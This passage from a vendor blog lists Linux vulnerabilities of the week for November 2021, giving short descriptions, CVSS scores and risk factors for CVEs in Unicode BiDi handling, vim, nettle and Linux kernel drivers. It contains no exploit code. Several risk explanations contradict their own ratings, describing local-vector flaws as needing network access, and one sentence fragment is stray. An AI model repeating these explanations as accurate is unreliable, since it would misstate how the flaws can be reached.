3. Possible trojan source attacks in the Unicode Specification (through 14.0)

Severity: Important    CVSS Score: 8.3

This is a flaw in the way Unicode standards are implemented in the context of development environments, which have specialized requirements for rendering text.

An attacker could use this to deceive a human reviewer by creating a malicious patch containing well-placed BiDi characters. The special handling and rendering of those characters can be then used in an attempt to hide unexpected and potentially dangerous behavior from the reviewer.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a major risk as although this requires a complex attack and user interaction to be exploited, it can be exposed over any network with no privileges. Besides, this vulnerability allows a lateral attack to be made, due to the changed jump point.

  • Attack Vector: Network
  • Attack Complexity: High
  • Privileges Required: None
  • User Interaction: Required
  • Scope (Jump Point): Changed

CVE Reference(s): CVE-2021-42574

4. A heap-based buffer overflow in vim

Severity: Important    CVSS Score: 7.8

This is a flaw in vim. An attacker can exploit a possible heap-based buffer overflow to input a specially crafted file leading to a system crash or code execution.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a major risk as although this needs access to the same network as the device and requires user interaction, it can be exposed with a low complexity attack and without privileges.

  • Attack Vector: Local
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: Required
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-3778

5. Remote crash in RSA decryption affecting Red Hat Enterprise Linux 8

Severity: Important    CVSS Score: 7.5

This is a flaw in the way nettle’s RSA decryption functions handled specially crafted ciphertext. An attacker could use this flaw to provide a manipulated ciphertext leading to application crash and denial of service.

The highest threat from this vulnerability is to system availability.

Syxscore Risk Alert

This vulnerability has a high risk as this can be exposed over any network, with low complexity, no privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-3580

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
||

Linux Vulnerabilities of the Week: November 15, 2021

By News

Linux Vulnerabilities of the Week: November 15, 2021

See this week's top Linux issues and keep your IT environment protected from the latest November Linux vulnerabilities.

1. Possible trojan source attacks in the Unicode Specification (through 14.0)

Severity: Critical         CVSS Score: 9.8

This is a flaw in the way Unicode standards are implemented in the context of development environments, which have specialized requirements for rendering text.

An attacker could use this to deceive a human reviewer by creating a malicious patch containing well-placed BiDi characters. The special handling and rendering of those characters can be then used in an attempt to hide unexpected and potentially dangerous behavior from the reviewer.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a critical risk as this can be exposed over any network, with low complexity, no privileges, and without user interaction.

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-42574

2. A heap-based buffer overflow in vim

Severity: Important    CVSS Score: 7.8

This is a flaw in vim. An attacker can exploit a possible heap-based buffer overflow to input a specially crafted file leading to a system crash or code execution.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a major risk as although this needs access to the same network as the device and requires user interaction, it can be exposed by an unprivileged user with a low complexity attack.

  • Attack Vector: Local
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: Required
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-3778

3. The Linux kernel (< 5.13.13) vulnerability

Severity: Important    CVSS Score: 7.8

The decode_data function in drivers/net/hamradio/6pack.c in the Linux kernel has a slab out-of-bounds write. Input from a process that has the CAP_NET_ADMIN capability can lead to root access.

The Linux kernel (< 5.13.13) vulnerability

Syxscore Risk Alert

This vulnerability has a major risk as although this needs access to the same network as the device, it can be exposed with a low complexity attack, low privileges, and without user interaction.

  • Attack Vector: Local
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-42008

4. Memory overwrite in the Linux kernel (<5.14.6) with potential privileges execution

Severity: Important    CVSS Score: 7.8

This is a flaw in aspeed_lpc_ctrl_mmap in drivers/soc/aspeed/aspeed-lpc-ctrl.c in Aspeed Low Pin Count (LPC) Bus Controller in the Linux kernel.

A local attacker can exploit a miss in the sanity check to bypass the boundary check, and map pages that are located outside the memory region reserved by the driver, potentially executing privileges, aka CID-b49a0e69a7b1.

Syxscore Risk Alert

This vulnerability has a major risk as although this needs access to the same network as the device, it can be exposed with a low complexity attack, low privileges, and without user interaction.

  • Attack Vector: Local
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-42252

5. Heap buffer overflow in FireDTV media card driver affecting Red Hat Enterprise Linux 7 and 8

Severity: Important    CVSS Score: 7.8

This is a heap-based buffer overflow flaw in the Linux kernel (through  5.14.13) FireDTV media card driver, where the user calls the CA_SEND_MSG ioctl. Exploiting this vulnerability a local user of the host machine can crash the system or escalate privileges.

The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Syxscore Risk Alert

This vulnerability has a major risk as although this needs access to the same network as the device, it can be exposed with a low complexity attack, low privileges, and without user interaction.

and no user interaction required.

  • Attack Vector: Local
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None
  • Scope (Jump Point): Unchanged

CVE Reference(s): CVE-2021-42739

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo